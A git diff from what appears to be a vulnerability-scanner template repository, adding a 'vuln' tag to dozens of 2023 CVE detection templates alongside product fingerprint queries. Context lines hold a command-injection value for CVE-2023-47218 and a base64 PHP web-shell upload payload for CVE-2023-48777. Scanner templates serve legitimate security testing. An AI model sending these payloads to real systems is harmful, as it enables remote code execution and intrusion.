b/http/cves/2023/CVE-2023-45542.yaml @@ -25,7 +25,7 @@ info: product: moosocial shodan-query: http.favicon.hash:"702863115" fofa-query: icon_hash="702863115" - tags: cve2023,cve,xss,moosocial + tags: cve2023,cve,xss,moosocial,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-45671.yaml b/http/cves/2023/CVE-2023-45671.yaml index 3ada40a8257..3ffaf0694a0 100644 --- a/http/cves/2023/CVE-2023-45671.yaml +++ b/http/cves/2023/CVE-2023-45671.yaml @@ -29,7 +29,7 @@ info: - http.title:"frigate" fofa-query: title="frigate" google-query: intitle:"frigate" - tags: cve,cve2023,frigate,xss + tags: cve,cve2023,frigate,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index 996dd083db2..488098a12e9 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -33,7 +33,7 @@ info: - body='content="papercut' - body="content=\"papercut\"" google-query: html:'content="papercut' - tags: cve2023,cve,unauth,papercut + tags: cve2023,cve,unauth,papercut,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-45826.yaml b/http/cves/2023/CVE-2023-45826.yaml index d8700eaedff..772c0f7e676 100644 --- a/http/cves/2023/CVE-2023-45826.yaml +++ b/http/cves/2023/CVE-2023-45826.yaml @@ -22,7 +22,7 @@ info: vendor: leantime product: leantime shodan-query: title:"Leantime" - tags: cve,cve2023,leantime,authenticated,sqli + tags: cve,cve2023,leantime,authenticated,sqli,vuln variables: username: "{{username}}" diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index 3738188d4d3..e3fedb30aa6 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -32,7 +32,7 @@ info: - title="Vitogate 300" - title="vitogate 300" google-query: intitle:"vitogate 300" - tags: cve2023,cve,rce,vitogate,viessmann,vkev + tags: cve2023,cve,rce,vitogate,viessmann,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml index 69348ccbcae..ed816033d91 100644 --- a/http/cves/2023/CVE-2023-45855.yaml +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -28,7 +28,7 @@ info: product: qdpm shodan-query: "http.favicon.hash:762074255" fofa-query: "icon_hash=762074255" - tags: cve,cve2023,qdpm,lfi + tags: cve,cve2023,qdpm,lfi,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-45878.yaml b/http/cves/2023/CVE-2023-45878.yaml index ffbfa333041..de4bc2564d9 100644 --- a/http/cves/2023/CVE-2023-45878.yaml +++ b/http/cves/2023/CVE-2023-45878.yaml @@ -28,7 +28,7 @@ info: - http.favicon.hash:-165631681 - http.favicon.hash:"-165631681" fofa-query: icon_hash="-165631681" - tags: cve2023,cve,file-upload,rce,gibbonedu,gibbon,vkev + tags: cve2023,cve,file-upload,rce,gibbonedu,gibbon,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-4596.yaml b/http/cves/2023/CVE-2023-4596.yaml index 0e89dc238cd..c35d40f5ed1 100644 --- a/http/cves/2023/CVE-2023-4596.yaml +++ b/http/cves/2023/CVE-2023-4596.yaml @@ -31,7 +31,7 @@ info: publicwww-query: - /wp-content/plugins/Forminator - /wp-content/plugins/forminator - tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub,vkev + tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub,vkev,vuln variables: string: "CVE-2023-4596" diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index aff148f1f0a..d6a4dc5bc0f 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -32,7 +32,7 @@ info: shodan-query: http.html:wp-content/plugins/media-library-assistant fofa-query: body=wp-content/plugins/media-library-assistant publicwww-query: "wp-content/plugins/media-library-assistant" - tags: cve,cve2023,packetstorm,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant,davidlingren,vkev + tags: cve,cve2023,packetstorm,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant,davidlingren,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index dca08ee395e..496e386a476 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -24,7 +24,7 @@ info: product: ndk_steppingpack framework: prestashop shodan-query: http.component:"prestashop" - tags: time-based-sqli,cve,cve2023,sqli,prestashop,ndk_steppingpack,ndkdesign,vkev + tags: time-based-sqli,cve,cve2023,sqli,prestashop,ndk_steppingpack,ndkdesign,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2023/CVE-2023-46359.yaml b/http/cves/2023/CVE-2023-46359.yaml index f94ec6116b3..f230d3b5a87 100644 --- a/http/cves/2023/CVE-2023-46359.yaml +++ b/http/cves/2023/CVE-2023-46359.yaml @@ -27,7 +27,7 @@ info: vendor: hardy-barth product: cph2_echarge shodan-query: html:"Salia PLCC" - tags: cve2023,cve,salia-plcc,cph2,rce,hardy-barth + tags: cve2023,cve,salia-plcc,cph2,rce,hardy-barth,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-46455.yaml b/http/cves/2023/CVE-2023-46455.yaml index 8301c1f4429..1df1b214262 100644 --- a/http/cves/2023/CVE-2023-46455.yaml +++ b/http/cves/2023/CVE-2023-46455.yaml @@ -22,7 +22,7 @@ info: vendor: gl-inet product: gl-ar300m_firmware shodan-query: title:"GL.iNet Admin Panel" - tags: cve,cve2023,gl-net,file-upload,intrusive + tags: cve,cve2023,gl-net,file-upload,intrusive,vuln variables: string: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index 7ae707eab0e..8d8a03348cd 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -30,7 +30,7 @@ info: - http.title:"totolink" fofa-query: title="totolink" google-query: intitle:"totolink" - tags: cve,cve2023,totolink,router,iot,rce,vkev + tags: cve,cve2023,totolink,router,iot,rce,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-4666.yaml b/http/cves/2023/CVE-2023-4666.yaml index 2314847a08b..dc3e901f9fe 100644 --- a/http/cves/2023/CVE-2023-4666.yaml +++ b/http/cves/2023/CVE-2023-4666.yaml @@ -23,7 +23,7 @@ info: vendor: 10web product: form_maker framework: wordpress - tags: wpscan,cve,cve2023,wordpress,wp-plugin,form-maker,passive,vkev + tags: wpscan,cve,cve2023,wordpress,wp-plugin,form-maker,passive,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-46732.yaml b/http/cves/2023/CVE-2023-46732.yaml index daaea9b36e6..a9ea82df638 100644 --- a/http/cves/2023/CVE-2023-46732.yaml +++ b/http/cves/2023/CVE-2023-46732.yaml @@ -28,7 +28,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2024,xwiki,xss,vkev + tags: cve,cve2024,xwiki,xss,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index 5497772aaf6..9c71e44f6b2 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -30,7 +30,7 @@ info: - http.title:"big-ip®-+redirect" +"server" fofa-query: title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" - tags: cve2023,cve,packetstorm,rce,f5,bigip,unauth,ajp,smuggling,intrusive,kev,vkev + tags: cve2023,cve,packetstorm,rce,f5,bigip,unauth,ajp,smuggling,intrusive,kev,vkev,vuln variables: username: "{{hex_encode(rand_base(5))}}" password: "{{hex_encode(rand_base(12))}}" diff --git a/http/cves/2023/CVE-2023-46805.yaml b/http/cves/2023/CVE-2023-46805.yaml index 73c6860c8cd..66bbcd6ad39 100644 --- a/http/cves/2023/CVE-2023-46805.yaml +++ b/http/cves/2023/CVE-2023-46805.yaml @@ -26,7 +26,7 @@ info: shodan-query: "html:\"welcome.cgi?p=logo\"" fofa-query: body="welcome.cgi?p=logo" google-query: intitle:"ivanti connect secure" - tags: packetstorm,cve,cve2023,kev,auth-bypass,ivanti,vkev + tags: packetstorm,cve,cve2023,kev,auth-bypass,ivanti,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-46818.yaml b/http/cves/2023/CVE-2023-46818.yaml index 881eb267eb9..d5173fb05ce 100644 --- a/http/cves/2023/CVE-2023-46818.yaml +++ b/http/cves/2023/CVE-2023-46818.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 product: ispconfig - tags: cve,cve2023,ispconfig,php,rce + tags: cve,cve2023,ispconfig,php,rce,vuln flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) diff --git a/http/cves/2023/CVE-2023-47105.yaml b/http/cves/2023/CVE-2023-47105.yaml index f2b3f5f8312..681943c3029 100644 --- a/http/cves/2023/CVE-2023-47105.yaml +++ b/http/cves/2023/CVE-2023-47105.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: chaosblade-io product: chaosblade - tags: cve,cve2023,chaosblade,rce,vkev + tags: cve,cve2023,chaosblade,rce,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-47115.yaml b/http/cves/2023/CVE-2023-47115.yaml index e574bc3c857..bdd0f8ba96d 100644 --- a/http/cves/2023/CVE-2023-47115.yaml +++ b/http/cves/2023/CVE-2023-47115.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.favicon.hash:-1649949475 product: label_studio vendor: humansignal - tags: cve,cve2023,xss,authenticated,intrusive,label-studio + tags: cve,cve2023,xss,authenticated,intrusive,label-studio,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-47117.yaml b/http/cves/2023/CVE-2023-47117.yaml index 0ca440eed17..dbfdb4e8efd 100644 --- a/http/cves/2023/CVE-2023-47117.yaml +++ b/http/cves/2023/CVE-2023-47117.yaml @@ -24,7 +24,7 @@ info: vendor: humansignal product: label_studio shodan-query: http.favicon.hash:-1649949475 - tags: cve,cve2023,label_studio,oss,exposure,authenticated + tags: cve,cve2023,label_studio,oss,exposure,authenticated,vuln variables: Task_id: "{{task}}" diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index b91e59ab515..88bf534e8b5 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: playtube product: playtube - tags: cve2023,cve,playtube,exposure + tags: cve2023,cve,playtube,exposure,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-47211.yaml b/http/cves/2023/CVE-2023-47211.yaml index 9e9bb7f9823..76d210455dd 100644 --- a/http/cves/2023/CVE-2023-47211.yaml +++ b/http/cves/2023/CVE-2023-47211.yaml @@ -27,7 +27,7 @@ info: - http.title:"opmanager plus" fofa-query: title="opmanager plus" google-query: intitle:"opmanager plus" - tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp + tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-47218.yaml b/http/cves/2023/CVE-2023-47218.yaml index d7047c71d64..0a1af72658b 100644 --- a/http/cves/2023/CVE-2023-47218.yaml +++ b/http/cves/2023/CVE-2023-47218.yaml @@ -26,7 +26,7 @@ info: shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS" product: qts vendor: qnap - tags: cve,cve2023,qnap,qts,quts,rce,intrusive,vkev + tags: cve,cve2023,qnap,qts,quts,rce,intrusive,vkev,vuln variables: file: '{{rand_base(6)}}' cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22' diff --git a/http/cves/2023/CVE-2023-47246.yaml b/http/cves/2023/CVE-2023-47246.yaml index 2f8df29ceed..ae845ce79b4 100644 --- a/http/cves/2023/CVE-2023-47246.yaml +++ b/http/cves/2023/CVE-2023-47246.yaml @@ -31,7 +31,7 @@ info: - http.favicon.hash:1540720428 - http.favicon.hash:"1540720428" fofa-query: icon_hash="1540720428" - tags: cve,cve2023,sysaid,rce,kev,traversal,intrusive,vkev + tags: cve,cve2023,sysaid,rce,kev,traversal,intrusive,vkev,vuln variables: directory: "{{rand_base(5)}}" diff --git a/http/cves/2023/CVE-2023-47248.yaml b/http/cves/2023/CVE-2023-47248.yaml index 4aa920f7822..f18a39c8233 100644 --- a/http/cves/2023/CVE-2023-47248.yaml +++ b/http/cves/2023/CVE-2023-47248.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: apache product: pyarrow - tags: cve,cve2023,rce,arrow,pyarrow,apache,vkev + tags: cve,cve2023,rce,arrow,pyarrow,apache,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-47253.yaml b/http/cves/2023/CVE-2023-47253.yaml index bfe56f953cd..e7d4e13a8d4 100644 --- a/http/cves/2023/CVE-2023-47253.yaml +++ b/http/cves/2023/CVE-2023-47253.yaml @@ -24,7 +24,7 @@ info: vendor: qualitor product: qualitor fofa-query: "Qualitor" - tags: cve,cve2023,rce,qualitor + tags: cve,cve2023,rce,qualitor,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-47643.yaml b/http/cves/2023/CVE-2023-47643.yaml index ac2f87ba2d9..054d779f3f0 100644 --- a/http/cves/2023/CVE-2023-47643.yaml +++ b/http/cves/2023/CVE-2023-47643.yaml @@ -32,7 +32,7 @@ info: - http.title:"suitecrm" fofa-query: title="suitecrm" google-query: intitle:"suitecrm" - tags: cve,cve2023,graphql,suitecrm,introspection,salesagility,vkev + tags: cve,cve2023,graphql,suitecrm,introspection,salesagility,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-47684.yaml b/http/cves/2023/CVE-2023-47684.yaml index 0834dd3d199..e85dd79d89a 100644 --- a/http/cves/2023/CVE-2023-47684.yaml +++ b/http/cves/2023/CVE-2023-47684.yaml @@ -24,7 +24,7 @@ info: product: essential_grid framework: wordpress publicwww-query: "essential-grid-plugin" - tags: cve,cve2023,wordpress,wp,xss,wp-theme,essential-grid,themepunch + tags: cve,cve2023,wordpress,wp,xss,wp-theme,essential-grid,themepunch,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-47873.yaml b/http/cves/2023/CVE-2023-47873.yaml index e1ff7649432..31afc9650f4 100644 --- a/http/cves/2023/CVE-2023-47873.yaml +++ b/http/cves/2023/CVE-2023-47873.yaml @@ -27,7 +27,7 @@ info: product: wp_child_theme_generator framework: wordpress publicwww-query: "/wp-content/plugins/wp-child-theme-generator/" - tags: cve,cve2023,wordpress,wp-plugin,wp,wp-child-theme-generator,file-upload,authenticated,intrusive,rce + tags: cve,cve2023,wordpress,wp-plugin,wp,wp-child-theme-generator,file-upload,authenticated,intrusive,rce,vuln flow: http(1) && http(2) && http(3) && http(4) diff --git a/http/cves/2023/CVE-2023-48022.yaml b/http/cves/2023/CVE-2023-48022.yaml index 11383341db0..ed2d5e573c8 100644 --- a/http/cves/2023/CVE-2023-48022.yaml +++ b/http/cves/2023/CVE-2023-48022.yaml @@ -31,7 +31,7 @@ info: fofa-query: - icon_hash=463802404 - body="ray dashboard" - tags: cve,cve2023,rce,ray,anyscale,vkev + tags: cve,cve2023,rce,ray,anyscale,vkev,vuln variables: jobid: "Job_{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-48023.yaml b/http/cves/2023/CVE-2023-48023.yaml index 486812f8afe..79feb56997e 100644 --- a/http/cves/2023/CVE-2023-48023.yaml +++ b/http/cves/2023/CVE-2023-48023.yaml @@ -32,7 +32,7 @@ info: fofa-query: - icon_hash=463802404 - body="ray dashboard" - tags: cve,cve2023,ssrf,ray,anyscale,Anyscale + tags: cve,cve2023,ssrf,ray,anyscale,Anyscale,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index a890ff5d81e..2625a066437 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -34,7 +34,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: time-based-sqli,cve,cve2023,nagiosxi,sqli,authenticated,nagios,vkev + tags: time-based-sqli,cve,cve2023,nagiosxi,sqli,authenticated,nagios,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-48241.yaml b/http/cves/2023/CVE-2023-48241.yaml index e5021ad0299..f9dc9cf78d6 100644 --- a/http/cves/2023/CVE-2023-48241.yaml +++ b/http/cves/2023/CVE-2023-48241.yaml @@ -28,7 +28,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2024,xwiki,exposure + tags: cve,cve2024,xwiki,exposure,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-48728.yaml b/http/cves/2023/CVE-2023-48728.yaml index 08e4ed676f0..948101afc23 100644 --- a/http/cves/2023/CVE-2023-48728.yaml +++ b/http/cves/2023/CVE-2023-48728.yaml @@ -27,7 +27,7 @@ info: vendor: wwbn product: avideo shodan-query: html:"AVideo" - tags: cve,cve2023,avideo,xss,vkev + tags: cve,cve2023,avideo,xss,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-48777.yaml b/http/cves/2023/CVE-2023-48777.yaml index 832d8a3ba85..3d7eb0a565b 100644 --- a/http/cves/2023/CVE-2023-48777.yaml +++ b/http/cves/2023/CVE-2023-48777.yaml @@ -25,7 +25,7 @@ info: publicwww-query: "/wp-content/plugins/elementor/" product: website_builder vendor: elementor - tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated,vkev + tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated,vkev,vuln variables: filename: "{{rand_base(6)}}" payload: '{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}' diff --git a/http/cves/2023/CVE-2023-49070.yaml b/http/cves/2023/CVE-2023-49070.yaml index 637534d9011..33fe901d4d2 100644 --- a/http/cves/2023/CVE-2023-49070.yaml +++ b/http/cves/2023/CVE-2023-49070.yaml @@ -33,7 +33,7 @@ info: - app="Apache_OFBiz" - body="ofbiz" - app="apache_ofbiz" - tags: cve,cve2023,seclists,apache,ofbiz,deserialization,rce,vkev + tags: cve,cve2023,seclists,apache,ofbiz,deserialization,rce,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-49103.yaml b/http/cves/2023/CVE-2023-49103.yaml index 17ebdfd8dc7..7a9731a9506 100644 --- a/http/cves/2023/CVE-2023-49103.yaml +++ b/http/cves/2023/CVE-2023-49103.yaml @@ -31,7 +31,7 @@ info: - http.title:"owncloud" fofa-query: title="owncloud" google-query: intitle:"owncloud" - tags: cve2023,cve,owncloud,phpinfo,config,kev,vkev + tags: cve2023,cve,owncloud,phpinfo,config,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-49230.yaml b/http/cves/2023/CVE-2023-49230.yaml index bf1948d108c..3df1ac40c91 100644 --- a/http/cves/2023/CVE-2023-49230.yaml +++ b/http/cves/2023/CVE-2023-49230.yaml @@ -24,7 +24,7 @@ info: vendor: peplink product: balance_two_firmware shodan-query: html:"PEPLINK" - tags: cve,cve2023,peplink,intrusive,file-upload + tags: cve,cve2023,peplink,intrusive,file-upload,vuln flow: http(1) && http(2) && http(3) variables: diff --git a/http/cves/2023/CVE-2023-49489.yaml b/http/cves/2023/CVE-2023-49489.yaml index ac0570d5495..288f0781a65 100644 --- a/http/cves/2023/CVE-2023-49489.yaml +++ b/http/cves/2023/CVE-2023-49489.yaml @@ -20,7 +20,7 @@ info: vendor: kodcloud product: kodexplorer fofa-query: app="powered-by-kodexplorer" - tags: cve,cve2024,kodexplorer,xss + tags: cve,cve2024,kodexplorer,xss,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-49494.yaml b/http/cves/2023/CVE-2023-49494.yaml index b6688ed4b90..c0065e35dcc 100644 --- a/http/cves/2023/CVE-2023-49494.yaml +++ b/http/cves/2023/CVE-2023-49494.yaml @@ -27,7 +27,7 @@ info: product: dedecms shodan-query: http.html:"DedeCms" fofa-query: app="DedeCMS" - tags: cve,cve2023,dedecms,xss + tags: cve,cve2023,dedecms,xss,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index f254b512da9..3414b512159 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -30,7 +30,7 @@ info: - http.title:"citrix gateway" || title:"netscaler gateway" fofa-query: title="citrix gateway" || title:"netscaler gateway" google-query: intitle:"citrix gateway" || title:"netscaler gateway" - tags: cve,cve2023,citrix,adc,info-leak,kev,exposure,vkev + tags: cve,cve2023,citrix,adc,info-leak,kev,exposure,vkev,vuln variables: payload: '{{repeat("a", 24812)}}' str: "{{to_lower(rand_text_alpha(4))}}" diff --git a/http/cves/2023/CVE-2023-4973.yaml b/http/cves/2023/CVE-2023-4973.yaml index 0958cb22ab6..cb143c95372 100644 --- a/http/cves/2023/CVE-2023-4973.yaml +++ b/http/cves/2023/CVE-2023-4973.yaml @@ -28,7 +28,7 @@ info: fofa-query: - body="Academy LMS" - body="academy lms" - tags: packetstorm,cve2023,cve,academylms,xss,creativeitem + tags: packetstorm,cve2023,cve,academylms,xss,creativeitem,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index 3f8846dc2ce..eabcf7024dc 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -29,7 +29,7 @@ info: - html:"Academy LMS" - http.html:"academy lms" fofa-query: body="academy lms" - tags: time-based-sqli,cve,cve2023,packetstorm,sqli,academy,lms,creativeitem + tags: time-based-sqli,cve,cve2023,packetstorm,sqli,academy,lms,creativeitem,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-49785.yaml b/http/cves/2023/CVE-2023-49785.yaml index b262d030346..c5d46d6c23e 100644 --- a/http/cves/2023/CVE-2023-49785.yaml +++ b/http/cves/2023/CVE-2023-49785.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 2 shodan-query: "title:NextChat,\"ChatGPT Next Web\"" - tags: cve,cve2023,ssrf,xss,chatgpt,nextchat,vkev + tags: cve,cve2023,ssrf,xss,chatgpt,nextchat,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-5003.yaml b/http/cves/2023/CVE-2023-5003.yaml index 92d1efce214..538cfc957ed 100644 --- a/http/cves/2023/CVE-2023-5003.yaml +++ b/http/cves/2023/CVE-2023-5003.yaml @@ -23,7 +23,7 @@ info: vendor: miniorange product: active_directory_integration_\/_ldap_integration framework: wordpress - tags: wpscan,exposure,csv,ldap,wordpress,wp-plugin,cve,cve2023,miniorange + tags: wpscan,exposure,csv,ldap,wordpress,wp-plugin,cve,cve2023,miniorange,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-50094.yaml b/http/cves/2023/CVE-2023-50094.yaml index 67fbd81ef8c..79ef8e4ad83 100644 --- a/http/cves/2023/CVE-2023-50094.yaml +++ b/http/cves/2023/CVE-2023-50094.yaml @@ -23,7 +23,7 @@ info: vendor: yogeshojha product: rengine shodan-query: title:"reNgine" - tags: cve,cve2023,rengine,rce,injection,authenticated + tags: cve,cve2023,rengine,rce,injection,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-50290.yaml b/http/cves/2023/CVE-2023-50290.yaml index 047b89e73f1..b5126a46b88 100644 --- a/http/cves/2023/CVE-2023-50290.yaml +++ b/http/cves/2023/CVE-2023-50290.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"apache solr" - intitle:"solr admin" - tags: cve,cve2023,apache,solr,exposure + tags: cve,cve2023,apache,solr,exposure,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-50578.yaml b/http/cves/2023/CVE-2023-50578.yaml index abb2fc263e1..27cf02d0fb1 100644 --- a/http/cves/2023/CVE-2023-50578.yaml +++ b/http/cves/2023/CVE-2023-50578.yaml @@ -28,7 +28,7 @@ info: product: mcms shodan-query: http.favicon.hash:1464851260 fofa-query: icon_hash="1464851260" - tags: cve,cve2023,mingsoft,mcms,sqli + tags: cve,cve2023,mingsoft,mcms,sqli,vuln variables: num: "999999999" diff --git a/http/cves/2023/CVE-2023-50719.yaml b/http/cves/2023/CVE-2023-50719.yaml index 166030f5f1a..7cd00ca01cc 100644 --- a/http/cves/2023/CVE-2023-50719.yaml +++ b/http/cves/2023/CVE-2023-50719.yaml @@ -28,7 +28,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2024,xwiki,password,exposure + tags: cve,cve2024,xwiki,password,exposure,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-50720.yaml b/http/cves/2023/CVE-2023-50720.yaml index 098e1d24394..fbd5e5dea9c 100644 --- a/http/cves/2023/CVE-2023-50720.yaml +++ b/http/cves/2023/CVE-2023-50720.yaml @@ -28,7 +28,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2024,xwiki,email,exposure + tags: cve,cve2024,xwiki,email,exposure,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index d35c22aabad..cffd863a4bc 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -30,7 +30,7 @@ info: - http.favicon.hash:-1317621215 - http.favicon.hash:"-1317621215" fofa-query: icon_hash="-1317621215" - tags: cve2023,cve,d-link,auth-bypass,dlink,vkev + tags: cve2023,cve,d-link,auth-bypass,dlink,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-5089.yaml b/http/cves/2023/CVE-2023-5089.yaml index e87561bf4f9..cc516487cf1 100644 --- a/http/cves/2023/CVE-2023-5089.yaml +++ b/http/cves/2023/CVE-2023-5089.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/defender-security/ fofa-query: body=/wp-content/plugins/defender-security/ publicwww-query: "/wp-content/plugins/defender-security/" - tags: cve,cve2023,wordpress,wpscan,wp-plugin,defender-security,redirect,wpmudev + tags: cve,cve2023,wordpress,wpscan,wp-plugin,defender-security,redirect,wpmudev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-50917.yaml b/http/cves/2023/CVE-2023-50917.yaml index e42150ea546..0f8f06510ce 100644 --- a/http/cves/2023/CVE-2023-50917.yaml +++ b/http/cves/2023/CVE-2023-50917.yaml @@ -30,7 +30,7 @@ info: - app="MajordomoSL" - app="majordomosl" - icon_hash=1903390397 - tags: packetstorm,seclists,cve,cve2023,majordomo,rce,os,mjdm,vkev + tags: packetstorm,seclists,cve,cve2023,majordomo,rce,os,mjdm,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-50968.yaml b/http/cves/2023/CVE-2023-50968.yaml index 21b87159ab0..76e5df1462e 100644 --- a/http/cves/2023/CVE-2023-50968.yaml +++ b/http/cves/2023/CVE-2023-50968.yaml @@ -33,7 +33,7 @@ info: - app="Apache_OFBiz" - body="ofbiz" - app="apache_ofbiz" - tags: cve,cve2023,apache,ofbiz,ssrf,vkev + tags: cve,cve2023,apache,ofbiz,ssrf,vkev,vuln variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-51409.yaml b/http/cves/2023/CVE-2023-51409.yaml index 23a56bbf0ae..e232a2fb0df 100644 --- a/http/cves/2023/CVE-2023-51409.yaml +++ b/http/cves/2023/CVE-2023-51409.yaml @@ -26,7 +26,7 @@ info: product: ai_engine framework: wordpress publicwww-query: "/wp-content/plugins/ai-engine/" - tags: cve,cve2023,wp,wordpress,wp-plugin,ai-engine,intrusive,vkev + tags: cve,cve2023,wp,wordpress,wp-plugin,ai-engine,intrusive,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(7))}}" diff --git a/http/cves/2023/CVE-2023-51449.yaml b/http/cves/2023/CVE-2023-51449.yaml index b95f576fa2e..4e42760d0df 100644 --- a/http/cves/2023/CVE-2023-51449.yaml +++ b/http/cves/2023/CVE-2023-51449.yaml @@ -26,7 +26,7 @@ info: framework: python shodan-query: html:"__gradio_mode__" fofa-query: body="__gradio_mode__" - tags: cve,cve2024,lfi,gradio,unauth,intrusive + tags: cve,cve2024,lfi,gradio,unauth,intrusive,vuln variables: str: '{{rand_base(8)}}' diff --git a/http/cves/2023/CVE-2023-51467.yaml b/http/cves/2023/CVE-2023-51467.yaml index cc2c5a1e865..fd2ca93bde6 100644 --- a/http/cves/2023/CVE-2023-51467.yaml +++ b/http/cves/2023/CVE-2023-51467.yaml @@ -32,7 +32,7 @@ info: - app="Apache_OFBiz" - body="ofbiz" - app="apache_ofbiz" - tags: cve2023,cve,apache,ofbiz,rce,vkev + tags: cve2023,cve,apache,ofbiz,rce,vkev,vuln http: - 